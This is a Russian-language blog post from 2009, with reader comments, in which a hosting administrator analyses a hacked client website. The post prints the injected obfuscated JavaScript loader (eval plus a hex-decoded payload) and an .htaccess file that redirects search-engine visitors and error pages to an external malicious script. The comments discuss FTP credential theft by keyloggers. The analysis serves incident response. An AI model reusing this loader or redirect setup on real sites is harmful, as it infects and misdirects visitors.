Жадность, непрофессионализм и киберпреступность на unix хостингах

Года 3 или 4 назад, один наш знакомый попросил разместить на одном из наших хостингов свой статический сайт. Мы ему не отказали, дали ftp доступ до его директории и он потихонечку самостоятельно обновлял свой сайт с помощью FromPage через ftp. Но недавно Yandex прислал несколько уведомлений, что этот сайт заражает своих посетителей

Так выглядит сайт заражающий своих посетителей в Firefox3.5.2

Я начал разбираться и обнаружил сразу 2 вида заразы на сайте. Во-первых в конце документа идёт шелкод в JavaScript

< s cript >check_content()</ s cript >
< s cript >
c07zf=''yd2c783=/* y430c456 */document;yd2c783.write('<scr'+'ipt>function ya5dc45c4676(y17b43a7){return ev'+c07zf+'al(y17b43a7); }</scr'+'ipt>');  function c074a21767ydb11db(y0613ef7){  var z3f6=''return (ya5dc45c4676('pa'+z3f6+'rseInt')(y0613ef7,16));}function ydad4a13(y79762e){ function y15e305cc(){var y3a7a71c5d=2;return y3a7a71c5d;} var y7974d22a8=''y2b98a4b051='fromCh'y599aa=String[y2b98a4b051+'arCode'];for(y631b173b=0;y631b173b<y79762e.length;y631b173b+=y15e305cc()){ y7974d22a8+=(y599aa(c074a21767ydb11db(y79762e.substr(y631b173b,y15e305cc()))));}return y7974d22a8;} var y00d45bd970=?C7363726970743E69662821'+c07zf+?D796961'+c07zf+?B646F63756D656E742E777269746528756E65736361'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+'+c07zf+B7D7661'+c07zf+?D796961'+c07zf+?D747275653B3C2F7363726970743E'yd2c783.write(ydad4a13(y00d45bd970));
</ s cript >

Во-вторых почти во всех директориях этого сайта появились файлы .htaccess

find kirovtent.ru/ -name .htaccess|wc -l
       6

Со следующим содержанием

cat kirovtent.ru/www/.htaccess 
ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

Знающий язык mod_rewrite сразу понимает, что здесь находится правила которые перенаправляют посетителей пришедщих с google. ask. yahoo. excite. altavista. msn. netscape. aol. hotbot. goto. infoseek. mamma. alltheweb. lycos. search. metacrawler. bing. dogpile. на какой то скрипт на каком то казахстанском сайте

Разбираясь дальше, я вышел на перца, который делал им дизайн, ведь именно после обновления появились уведомления, http://konditer.blog.ru/ весьма впеатляющий вебмастер. Конечно, весьма трудно будет выбить из него признание виновности в установке вредоносного кода на сайт честной компании и наверняка придётся просто крикрыть им доступ и разорвать отношения, а сейчас как минимум нужно изменить пароль доступа по ftp

Напрашиваются следующие выводы, так как другие сайты на хостинге не были модифицированы значит модификация проводилась через ftp доступ. Аккаунт к которому либо упёрли у виндузятника предпринимателя либо у незадачливого вебмастера. Либо у вебмастера завёлся вирус которые хозяничает в директории с проектами

Скорее всего хозяин или этот "кондитер" не причём, так как зараза ориентирована на западных посетителей - Yandex, Rambler и прочих наших поисковиков нет в списке правил

Видимых признаков повреждения хостинга нет, в bash_history ничего подозрительно не найдено, хотя ни кто не мог помешать закачать какой нить злой PHP скрипт, который натворил бы делов. Остаётся надется на bacup мастерхоста и время, которое как известно всё лечит кроме жадности.

Вот так, скупость в развитии собственного сайта привела к тому, что сайт находится в чёрных списках поисковиков и даже FF3.5.2 отказывается его открывать, очень весело получилось

похожие страницы

  1. Кировский ЛУГ наконец-то снова открылся
  2. Masterhost: Windows хостинг для идиотов или сказки про дедушку Шукаря
  3. Как заработать на интернете в особо крупных масштабах
  4. Нашёл заражённый сайт, осталось выяснить вирус Касперского или пьяный админ
  5. Сдохла оболочка explorer у windows и про вирусы и про Каспера

#1:

Я регулярно вычищаю такие вещи с сайтов на хостинге, который я помогаю админить. Алгоритмизировать как-то не удается :(

ответить  2009-07-29 10:49:38 

#2:  Басманов:

re: Я регулярно вычищаю такие вещи с сайтов на хостинге

а откуда они берутся? с причиной не пытались бороться?

ответить  2009-07-29 10:51:50 

#3:

Я бы для начала посканил антивирусом все машины, с которых делался доступ по FTP. У меня в конторе был похожий случай встраивания вредоносного кода в пару наших сайтов. Вместе с хостером докопались до того, что страницы патчили по FTP. Отследили IP, на котором оказалась некая юникс-машина, но связаться с ответственным за диапазон не удалось.

Короче, наиболее очевидная причина атаки была в кейлоггере или другой malware, знавшей про то, как читать конфиг тотал коммандера с сохранёнными FTP паролями. Конкретно что это было выяснить не удалось, правда. И как оно сообщило инфу на командный сервер -- тоже неясно, поскольку хостам прямые коннекты с интернетом запрещены.

ответить  2009-07-30 22:12:23 

#4:


самый эффективный способ контроля таких атак на фтп сервера - это анализаторы изменения файлов, ко многим популярным КМС уже есть плагины, которые шлют отчеты об целостности файловой структуры
ну а делают такие вставки чаще всего фреймами, в вашем случае действовали профи, которые понимают, что такое умный редирект и как сложнее всего его обнаружить

ответить  2009-08-04 16:55:07 

#5:

а чмод не пробовали?

ответить  2010-06-09 01:28:59